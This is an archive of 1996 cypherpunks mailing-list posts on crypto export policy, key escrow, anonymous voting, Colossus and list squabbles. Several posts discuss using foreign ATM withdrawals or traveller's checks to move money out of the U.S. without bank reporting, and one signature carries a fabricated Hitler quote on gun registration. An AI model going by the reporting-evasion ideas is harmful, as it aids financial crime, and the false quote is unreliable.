converging with the PRC?

Which raises a question about the laws in the U.S. on "structuring" of
financial transfers.

If Alice uses her U.S. VISA card to make many cash withdrawals at ATMs in
Zurich, Lichtenstein, Geneva, London, etc., are there any U.S. requirements
that she obtain and fill out reports (in triplicate) on these transactions?
Suppose the cumulative ATM transactions hit the magic $10,000 level?

I've heard folks describe this as a sure-fire way to transfer funds out of
the U.S. to offshore banks, without the risks of carrying cash (*), but I
wonder if any laws actually make this fall into the "structuring" penumbra.
("Structuring" refers to, for example, making multiple sub-$10,000
transfers so as to (apparently) evade the intent of the U.S. law on
reporting all transactions of $10,000 or more.)

(* Traveller's checks, cashier's checks, etc., are other options. One
Cypherpunk has some interesting ideas about using traveller's checks to
evade the U.S. requirements.)


P.S. Do you know that if you save $200 a week out of your paycheck and put
under your mattress, that after a year you will have saved $10,000? That's
the good news. Now, the bad news. Do you know that if you try to deposit
this $10,000 in cash in a bank, or spend it on a car, that an investigation
may be triggered? That your money may be taken from you in an "asset
seizure"? Unless you can prove where you got the money--rather hard in the
mattress example--it may be taken from you and never returned, even if
there is never a court case charging you with a crime, much less a
conviction.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 28 Jul 1996 02:07:56 +0800
To: ichudov@algebra.com
Subject: Re: Bernstein files for partial summary judgement in crypto
In-Reply-To: <199607270513.AAA08975@manifold.algebra.com>
Message-ID: <Pine.SV4.3.91.960727120502.18625F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


It wqasn't the government who ridiculed the Smithsonian, it was private 
citizens. And if you call, letter-writing to the newspapers = harrasment, 
then you've set yourself inside a rather constrained emotional box, indeed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 28 Jul 1996 02:05:50 +0800
To: Shaun Clark <jacquard@teleport.com>
Subject: Re: Questions...
In-Reply-To: <31F9C0A5.4BA4@teleport.com>
Message-ID: <Pine.SV4.3.91.960727120905.18625H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Hello, I would rather I not be too blunt, but despite my generous
interest in computer > hacking cracking, and other such related topics, I
have come to be confused by the > mailer, can I ask any questions that I
wish, or am I limited by some type of header > subject?



Shaun, let me explain. There's a committee of seven people. Me, Tim May,
David Sternlight, some assination-politics guy, some guy named Vultis or
somesuch, and so on. 

Only if we're in unanimous agreement on the outcome of an issue, may you 
start a thread on a new topic. which then continues till the first 
posting which calls someone a Nazi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 28 Jul 1996 04:01:04 +0800
To: JonWienk@ix.netcom.com
Subject: Re: Publicly Verifiable Anonymous Voting System
In-Reply-To: <199607271553.IAA28911@dfw-ix2.ix.netcom.com>
Message-ID: <199607271806.NAA12990@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


JonWienk@ix.netcom.com wrote:
> 
> Here is the how the voting system works.
> 
> 1.  All voting information (public keys, ballots, ballot signatures, etc.) is 
> publicly available via a Web site or other similar means, and can be downloaded 
> in its entirety by anyone who cares to take the trouble to do so.  The software 
> (and source code) used to generate ballots should be publicly available as well.

or usenet

> 
> 2.  When someone registers to vote, they submit a RSA public key to a
> registered voter key database.  The public key database does not contain
> voter information; only keys.  Access to the key entry terminals is
> controlled, so that only registered voters can submit keys.  A receipt
> is given to the voter with a hash of the key printed on it (PGP
> fingerprint style), the key entry clerk's name,  a receipt serial
> number, etc., so the voter can verify the correct key was put in the
> system, and who to shoot if it wasn't.

so the authority that controls the voting knows to whom the keys belong.
When voters submit their votes, they will know who signed these votes.

I do not see how this system is anonymous.

Look into "Applied Cryptography" By Schneier, 2nd edition, Page 125.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 27 Jul 1996 14:38:20 +0800
To: cypherpunks@toad.com
Subject: Re: Why the world needs privay protecting Ecash
Message-ID: <ae1ee9b1080210040265@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:18 AM 7/27/96, Duncan Frissell wrote:
>At 12:05 PM 7/27/96 -0700, Timothy C. May wrote:
>
>>If Alice uses her U.S. VISA card to make many cash withdrawals at ATMs in
>>Zurich, Lichtenstein, Geneva, London, etc., are there any U.S. requirements
>>that she obtain and fill out reports (in triplicate) on these transactions?
>>Suppose the cumulative ATM transactions hit the magic $10,000 level?
>
>It might be hard to get an ATM card that lets you take out $10,000/day.  I
>suppose a VISA card or a Debit card might allow that amount.

Who said it had to be in one day? I didn't. Most vacations to Europe last a
couple of weeks, e.g., "If this is Tuesday, I need to make a withdrawal in
Milano."

I think a lot of ATMs will now dispense big chunks of cash--I've never
checked on limits, but I notice that some CRT screens now have chunks up to
$600 or so listed.


>The form doesn't have to be filed by individuals only by financial
>institutions. An ATM doesn't involve the bank giving you cash unless you are
>using the ATM machine at your own bank.  I remember seeing some regs that
>did mention ATM transfers but can't recall specifics.  Usually, they figure
>that they have the "paper trail" anyway through your normal bank records.

Thanks. Still not sure if it applies, but I'd forgotten that it's up to the
banks to do the reports; good to know it's not up to me.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sun, 28 Jul 1996 05:01:25 +0800
To: cypherpunks@toad.com
Subject: "privatizing" phones?
Message-ID: <TCPSMTP.16.7.27.14.20.56.2645935021.656681@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> have buttons to "privatize" you conversations. These
 In> were on no-cord models. Does anyone have any idea

 Hmmm... To Privatize a cordless phone, one would have to turn it off.


 P.J.
 pjn@nworks.com



... Save the whales...harpoon a politican!

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sun, 28 Jul 1996 05:04:36 +0800
To: cypherpunks@toad.com
Subject: HACKER REPORT
Message-ID: <TCPSMTP.16.7.27.14.21.2.2645935021.656682@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> Just saw part I of a two-part series on "hackers" being broadcast
 In> by a local San Francisco TV station.  Nothing horrible, in my
 In> opinion.  The adroitly sidestepped the hacker/cracker distinction
 In> by saying the "hacker" has come to mean..." and then gave the
 In> negative, intrusive definition.

  <<SNIP>>

 In> Tomorrow's show should be more interesting (and possibly much
 In> more sensationalistic).  Part II is "The Hacker Underground."
 In> Oooh, scary!

 Christ.  They are almost taking this chapter-for-chapter out of
 The Hacker Crackdown...


 P.J.
 pjn@nworks.com





... Descartes of Borg - "I assimilate, therefore I am."

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Sun, 28 Jul 1996 05:18:48 +0800
To: cypherpunks@toad.com
Subject: Public vs. Private Munitions
Message-ID: <2.2.32.19960727192453.0069bd10@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


Here's how I understand it:
     The U.S. Government, concerned only with making America a safer place
for us taxpayers to live in, wants to regulate domestic encryption in order
to have access to the content of all transmissions.  Their theory is that
any cryptosystem that is stronger than their cryptanalysis systems can be
used in illegal transmissions and should be considered munitions.
     Theoretically, the government should only be have the resources to
control commercially-available, public encryption systems.  Who is to stop
anyone from designing their own cryptosystem for personal use?  If the
government intercepted a transmission from this private cryptosystem, and
could not decrypt it, would they assume that it must be considered
munitions?  Similarly, anyone could send uniformly-formatted random garble
that could also be considered munitions, or at least waste the governments
processing time.
     Why are we so worried about government regulation?  Can't we just
devise our own cryptosystems and just don't sell them or make them publicly
available?

vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 28 Jul 1996 07:48:05 +0800
To: cypherpunks@toad.com
Subject: Is Colossus out of date?
Message-ID: <v03007807ae203e6acd07@[17.219.102.4]>
MIME-Version: 1.0
Content-Type: text/plain


You may recall recent comments by Attorney General Janet Reno where
she notes that exportable encryption cannot be broken in reasonable
time by modern supercomputers.

With that as background, you may find the following paragraph interesting.
It is from  the Financial Times article on Colossus.
	http://jya.com/coloss.txt

>   [Tony] Sale describes [Colossus] as a large electronic valve
>   programmable logic calculator. "No lay person would argue
>   that it is not a computer," he says. Furthermore, because
>   it wasted no time retrieving a stored program it was almost
>   as fast as a high-speed modern computer whose nominal
>   work-rate is 1,000 times quicker. A simulation of Colossus
>   which Sale ran on a top-of-the-range Pentium PC took twice
>   as long as the real thing.

Martin Minow
minow@apple.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Sun, 28 Jul 1996 08:16:17 +0800
To: cypherpunks@toad.com
Subject: Re: Game Theory and its Relevance to Cypherpunks
In-Reply-To: <199607250636.XAA06174@dns2.noc.best.net>
Message-ID: <9607272209.AA18318@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


James A. Donald wrote:
> At 03:21 AM 7/21/96 -0700, Llywarch Hen wrote:
> > What Timothy May espouses is not the appearance of craziness but actual
> > insanity itself.
> 
> The best way to convince others you are crazy is to actually be crazy.
> 
> More practically, if you organize your nuclear forces so that any 
> serious war is likely to escalate uncontrollably into the battle of 
> armageddon, regardless of your intentions and desires, which is how 
> the American government organized its nuclear forces in Europe, 
> then you can pretty much guarantee you will not have to face a 
> serious war.

This was, of course, the logic behind the alliances before World War I.
It was obviously suicidal to start a war with any of the major powers,
but it happened anyway.

Game theory is the proper tool to analyze this sort of scenario, but the
tendency for non-ideal behavior has to be factored in.  Brinksmanship
is another aspect of game theory, too...

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wayne H. Allen" <whallen@capitalnet.com>
Date: Sun, 28 Jul 1996 06:27:00 +0800
To: cypherpunks@toad.com
Subject: Re: Olympic bombing
Message-ID: <199607271949.PAA05828@ginger.capitalnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 17:41 96.07.27 +0200, Mike van der Merwe wrote:

>I can just see the FBI screaming "we need weaker encryption to combat
>terrosism on US soil" with nasty effects -- it seems all to many people,
>lawmakers included, will be only to happy to sacrifice their privacy that
>the FBI can better combat these terrorist acts (which could *of course*
>could been prevented had only the FBI been able to read their encrypted
>mail...)
>
>Somehow I got the feeling watching CNN that the FBI was given a shitload
>of ammo. Call me cynical but the Reichstag fire comes to mind... 


    The phrase "Get a life" comes to mind.
Wayne H.Allen
whallen@capitalnet.com
Pgp key at www.capitalnet.com/~whallen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 28 Jul 1996 09:17:42 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
Message-ID: <2.2.32.19960727231424.00da4094@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:21 PM 7/27/96 GMT, John Young wrote:
>   The Washington Post, July 27, 1996, p. A22. 

[Snip]
> Mr. Freeh and others argue, "the genie is not yet 
>   out of the bottle" on "robust," meaning uncrackable, 
>   encryption. 

Why does it sounds like Mr. Freeh and his friends are drinking out of a
different bottle than the rest of us?

The genie is out of the bottle and has been for a while.  The tools are
there for those who care to use them.  

Maybe it is a diffrenet genie that he is trying to portray...  Maybe it is
the acceptance and relyance on crypto that has not quite escaped into the
general populace.

If someone tried to portray all automobie drivers as dangerous maniacs and
cars as only useful for making getaways, he would be laughed out of the
room.  If someone tried to claim that phones are a haven for drug dealers,
and thus must be licenced, they would get a harsh reaction from the public.

Freeh is fighting a war against the public having a positive view of Crypto.
By smearing crypto users as "criminals and terrorists", he is using his
office to influence the opinions of "law abiding citizens" to be anti-crypto.

I beleive that there is alot that can be done to influence the public to be
pro-crypto.  With the proper memes, you can reveal the flaws in the
anti-privacy forces arguments.

Here are a few in no particular order...

Teaching computer users how to use PGP.  Offer to give instruction in use of
PGP amongst general PC and Mac users groups.

Whenever possible associate the wiretapping requests of the FBI with the
opening of mail.  Remind people of the abuses in the past.  Ask them of if
they can remember any good coming from these program.  Ask them if they mind
*you* looking through their mail and what makes the Government any better or
worse.

Local stations will usually have a "public forum discussion" program on
varioussubjects.  get on it.  Usually the program is rigged in one direction
por another, but you can get in a good meme or two that will stick in the
heads of the people watching.  (And it can be alot of fun!)

Offer to sponsor a crypto archive and discussion area on a local BBS.  Keep
it current.  Get others interested.  Spread the tools and teach people how
to use them.

Build web sites that are pro-crypto.  Where possible, get them working under
SSL.  Are there any SSL crypto sites out there?  I know of only one, and it
is not advertised.  (Or up to date.)

Work fast lest the darkness overcome us all...


Be creative.  The control freaks and authoritarians lack that creativity.
Lets use it to our advantage.
---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 28 Jul 1996 10:28:19 +0800
To: cypherpunks@toad.com
Subject: Overwhelmed With Stupid Questions
In-Reply-To: <Pine.LNX.3.94.960727191340.784A-100000@gak>
Message-ID: <199607280025.RAA15779@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark M. Writes:

 > It's quite obvious from the context of the post what the original 
 > poster was asking.  You're just being a smart-ass.  Your nonsense 
 > post is the kind of thing that most 5th graders would find immature.
 > Grow up.

Every once in a while, this list receives a burst of inquiries
which...

  A.  Are clearly explained in a number of widely available FAQs
      which one would hope people interested in cryptography would
      have bothered to read.

  B.  Request information which reasonable persons might better 
      obtain by using, or learning to use, various commonly
      available Net grepping tools.

If the Nth such inquiry in a given week is not always responded to
with complete and utter seriousness, that is something you and
others of your ilk will just have to deal with. 

This is Cypherpunks.  It is not "Unix hacking hints", "Introduction to
Cryptography", nor "Fun With Batteries and Wire."

Everyone with an interest in the topics covered by this list is 
welcome here, but let's keep the "What is DES?" questions out of
the feed from the list server. 

This is, of course, merely the opinion of one person, and may be
agreed with or ignored as others see fit. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 28 Jul 1996 03:43:29 +0800
To: cypherpunks@toad.com
Subject: COL_oss
Message-ID: <199607271737.RAA10853@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-27-96. FiTi: 
 
   "Colossus faces rebirth into a world of dispute." 
 
 
      The man behind the resurrection of Colossus is Tony 
      Sale, a computer expert and former MI5 operative who 
      once worked for Peter Wright of "Spycatcher" fame. Its 
      reconstruction, now in its final weeks, is not merely an 
      act of homage to the mathematical supermen of Bletchley 
      who hastened the Allied victory over the Nazis. Neither 
      is it just a triumph over the official secrecy in which 
      the machine was cloaked until a few years ago. It is a 
      working demonstration of Sale's contention that Colossus 
      was the world's first computer. 
 
 
      So sophisticated was the machine intelligence at 
      Bletchley Park that the very existence of Colossus was 
      not revealed until 1970, according to Tony Sale. After 
      the war the government ordered 10 Colossi to be broken 
      up -- some say as part of an intelligence deal with the 
      Americans. 
 
 
      Gripped by a desire to assert the claims of Colossus, 
      the former MI5 man asked GCHQ to reinstate his security 
      clearance so he could work on the project. The parts 
      could be found in any British telephone exchange up to 
      the 1970s. Yet it took until 1992 to get all the 
      electronics declassified. Only last November was Sale 
      allowed to demonstrate the machine's ability to break 
      the Lorenz wheel settings. Even today members of the 
      public are forbidden to operate Colossus: some of its 
      codebreaking algorithms are still, it seems, a secret. 
 
 
   ----- 
 
   http://jya.com/coloss.txt  (15 kb) 
 
   COL_oss 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike van der Merwe <mikev@is.co.za>
Date: Sun, 28 Jul 1996 01:37:51 +0800
To: cypherpunks@toad.com
Subject: Olympic bombing
In-Reply-To: <31F9C2BC.5458@teleport.com>
Message-ID: <Pine.GSO.3.95.960727172741.11971E-100000@admin.is.co.za>
MIME-Version: 1.0
Content-Type: text/plain



Hi all

I can just see the FBI screaming "we need weaker encryption to combat
terrosism on US soil" with nasty effects -- it seems all to many people,
lawmakers included, will be only to happy to sacrifice their privacy that
the FBI can better combat these terrorist acts (which could *of course*
could been prevented had only the FBI been able to read their encrypted
mail...)

Somehow I got the feeling watching CNN that the FBI was given a shitload
of ammo. Call me cynical but the Reichstag fire comes to mind... 

Later
Mike

___________________

"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Sun, 28 Jul 1996 03:34:50 +0800
To: "'Shaun Clark'" <jacquard@teleport.com>
Subject: RE: Overwelmed with Stupidity...
Message-ID: <01BB7BF2.DF9051E0@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


Shaun Clark[jacquard@teleport.com] wrote 27 juillet 1996 09:18

>For instance what the heck is a TRS-80, DES, or even GAK?

TRS-80: A venerable microcomputer, twenty years ago (Tandy Radio Shack, I believe with 80 columns); many experiences begin with this one (and Altair (some years before) or Apple II).

DES: Data Encryption Standard, a (also venerable) cryptography algorithm, it has a too short key (56 bits effective) but a good design. Recycled, with TripleDES (or 3DES), in a three pass function.

GAK: Government Access to Key, his private key must be deposited (mandatory or pushed voluntary) to a public or private (registered) agency. The Law Enforcement Agencies (and intelligence agencies, but sh!) have access to the key with a court order (nobody is smiling).

Jean-Paul

~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Sun, 28 Jul 1996 11:38:52 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Twenty Beautiful Women
In-Reply-To: <ae2005a310021004b85c@[205.199.118.202]>
Message-ID: <v03007801ae20758ab052@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 AM -0700 7/28/96, Timothy C. May wrote:
>At 6:19 PM 7/27/96, David Sternlight wrote:
>>Here's another:
>>
>>Twenty beautiful women are to pass before you, one by one (or 20 handsome
>>men). You see only one at a time. You cannot speak to them. After seeing
>>any one, you must pick her or reject her. If you reject her, you cannot
>>change your mind. If you pick her the exercise terminates.
>>
>>What is the optimal strategy for insuring you get the most beautiful woman
>>possible under the circumstances?
>
>Look at the first 1/e of them, or about the first 36.8% of them. In this
>case, the first 7 of them. Then pick the first one after this group which
>is better than any of the first group.
>
>While there is some chance that one will get to #20 and find that none of
>#8-20 were better than #1-7, this strategy is the best compromise between
>"committing too early" and "waiting too long."

Correct.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Sun, 28 Jul 1996 11:59:25 +0800
To: cypherpunks@toad.com
Subject: Re: Publicly Verifiable Anonymous Voting System
In-Reply-To: <199607271806.NAA12990@manifold.algebra.com>
Message-ID: <199607280143.SAA21148@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Jul 1996, ichudov@algebra.com (Igor Chudov @ home) wrote:
>so the authority that controls the voting knows to whom the keys belong.
>When voters submit their votes, they will know who signed these votes.
>
>I do not see how this system is anonymous.
>
>Look into "Applied Cryptography" By Schneier, 2nd edition, Page 125.
>
>	- Igor.

To the extent that no link is recorded between a particular key and a particular 
voter, the system is anonymous. As I said in the original post, if the govt 
cheats during the key registration process, the system is not anonymous. 
However, if the registered voter database and the key/ballot database are on 
non-connected, separate systems, it is certainly possible to devise a key 
registration protocol to ensure anonymity.

Here is a more detailed description of the registration method:
1.  The registration process takes place in two separate rooms, one anonymous, 
and one non-anonymous, which are staffed by separate people, with separate 
computer systems.  The only way to enter/exit the anonymous room is via the 
non-anonymous room.

2.  The voter enters the non-anonymous room, where he provides proofs of 
identity and residence and is entered in the registered voter database, which is 
NOT publicly available.

3.  Once the voter has demonstrated eligibility, he is given a token that 
designates him as a registered voter, but has no personal information. A 
hard-to-counterfeit carved rod (too large to conceal on one's person) or 
something similar would be a good choice.

4.  The token gives the voter clearance to enter the anonymous room. Upon 
presenting the token, the voter inputs his key into the key database. (Insert 
your key disk in drive A and press Enter...) After the key has been entered into 
the system, the voter is given the receipt indicating that his key has been 
entered in the key database.

5.  The voter goes back to the non-anonymous room.  He turns in the token, signs 
a statement indicating that he entered a key and received a receipt for it, (to 
prevent voters from registering more than one key and thus voting more than 
once) and then goes home.

Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sun, 28 Jul 1996 04:13:45 +0800
To: CP <cypherpunks@toad.com>
Subject: Re: ALL OF YOU ARE CRIMINAL HACKERS, I AM GOING TO CALL FBI
In-Reply-To: <199607270433.VAA28441@jobe.shell.portal.com>
Message-ID: <9607271904.aa21871@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <199607270433.VAA28441@jobe.shell.portal.com>, anonymous-remailer@sh
ell.portal.com writes:
>I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
>AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
>CAN TRACK YOU DOWN AND CLOSE THIS LIST.

	Troll, troll, troll your post gently down the stream.
	Merrilly, merrilly, merrilly, merrilly, your threat is just steam.

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 28 Jul 1996 06:14:55 +0800
To: cypherpunks@toad.com
Subject: WaPo on Crypto-Genie Terrorism
Message-ID: <199607271921.TAA27750@pipe2.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Washington Post, July 27, 1996, p. A22. 
 
 
   Speaking in Code on the Internet ... [Editorial] 
 
 
   The decibel level has been rising in the argument over how 
   much control the federal government should have over the 
   export of encryption technology. The Senate Commerce 
   Committee held hearings Thursday on a proposal dubbed 
   Pro-CODE (Promotion of Commerce On-line in the Digital Era) 
   that would lift current restrictions on exporting 
   encryption software above a certain level of complexity. 
   The move is opposed strongly by law enforcement and 
   national security authorities, who fear the consequences to 
   their tracking of terrorism or crime if uncrackable 
   cryptography becomes the global standard. 
 
 
   But encryption software -- which scrambles a person's 
   computer messages so no one can read them without a key -- 
   also is thought by many in the computer industry to be the 
   missing piece that's preventing customers from a full-scale 
   move to the Internet for banking and other confidential 
   transactions, rather than, as now, worrying about the 
   security of their data. They also see it as a market in 
   which the United States maintains a comfortable lead, one 
   that is threatened if domestic encryption makers can't sell 
   their products elsewhere. The makers argue that foreign 
   encryption software will rush in to fill the gap, doing 
   nothing about the uncrackability problem -- indeed, making 
   it worse. The administration in turn is pursuing a wider 
   international agreement to maintain controls on cryptology 
   export by all the industrialized nations and has been 
   putting pressure on its colleagues in the Organization for 
   Economic Cooperation and Development, which will rule on 
   the matter in a Paris meeting in September. 
 
 
   Administration officials, including FBI chief Louis Freeh, 
   have been pushing for an alternative policy of "voluntary 
   key escrow" -- encryption makers would deposit a key to the 
   code with a neutral third body before exporting the 
   products and could then have access to the codes only by 
   court order, as happens now with wiretapping. Mr. Freeh, 
   testifying at Thursday's hearing in favor of an optional 
   key escrow plan, noted that the point is not to prevent all 
   copies of uncrackable code from going abroad --  that's 
   clearly impossible -- but to prevent such high-level code 
   from becoming the international standard, with architecture 
   and transmission channels all unreadable to world 
   authorities. To software companies and Internet users who 
   have been clamoring for the right to encrypt as securely as 
   possible, Mr. Freeh and others argue, "the genie is not yet 
   out of the bottle" on "robust," meaning uncrackable, 
   encryption. 
 
 
   It's far from obvious to anyone that an optional escrow 
   plan really can prevent the growth of inaccessible 
   transmissions by international terrorists or criminals. 
   Encryption, if widely used, could conceivably ease some 
   privacy problems concerning who gets to see personal and 
   financial data on individuals -- though such data usually 
   are vulnerable to being dug out of storage rather than 
   intercepted in transmission. But neither is it clear that 
   the encryption enthusiasts' desire for free development 
   should take precedence over the tracking of terrorism. At 
   the very least, Congress should be exceedingly cautious 
   about getting out ahead of administration concerns on 
   controls that, once lifted, are hardly reversible. 
 
 
   ----- 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sun, 28 Jul 1996 09:37:00 +0800
To: cypherpunks@toad.com
Subject: Re: ALL OF YOU ARE CRIMIN
Message-ID: <TCPSMTP.16.7.27.-13.30.38.2645935021.656744@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 > At 09:33 PM 7/26/96 -0700, anonymous-remailer@shell.portal.com wrote:
 >I AM NOT GOING TO TOLERATE EXISTENCE OF A MEDIUM FOR CRIMINAL HACKERS
 >AND MUNITIONS SMUGGLERS. I WILL COMPLAIN TO THE FBI IMMEDIATELY SO THAT THEY
 >CAN TRACK YOU DOWN AND CLOSE THIS LIST.
 >

 Damnit Sen. Exxon!  We told you not to use the computer!! :)


 P.J.
 pjn@nworks.com



... "The future of robotics" Ä by Cy Borg and Anne Droid

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Sun, 28 Jul 1996 12:25:49 +0800
To: "'cypherpunks@toad.com>
Subject: Decrypt info about domain name
Message-ID: <01BB7C70.66036320@ip68.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Where can I find the file to decrypt in order to change the domain name of a Unix system? 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 28 Jul 1996 09:22:00 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Overwelmed with Stupidity...
In-Reply-To: <199607271755.KAA17499@netcom11.netcom.com>
Message-ID: <Pine.LNX.3.94.960727191340.784A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Jul 1996, Mike Duvos wrote:

> Well, I will admit the first one was satire, but the last two
> were perfectly accurate.  For the humor impaired, this is an
> example of AOL.  (That's Acronym OverLoad, not to be confused
> with the popular online service.)
> 
> You see, Gregory, there are far more things in the universe than
> there are three letter abbreviations for them.  Hence, as the
> number of acronyms increases, collisions are inevitable. Asking
> "What is GAK?" or "What is ATM?" is really not well-defined
> outside of a narrow discipline.

It's quite obvious from the context of the post what the original poster was
asking.  You're just being a smart-ass.  Your nonsense post is the kind of
thing that most 5th graders would find immature.  Grow up.

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 28 Jul 1996 13:37:11 +0800
To: "'cypherpunks@toad.com>
Subject: RE: [NOISE IS NOISE] Re: Rand and smoking Re: Flaws of Thinkers  (Jefferson, Rand, Nietzsche, Voltaire, etc.) [NOISE E. D.]
Message-ID: <01BB7BFD.39BF47C0@blancw.accessone.com>
MIME-Version: 1.0
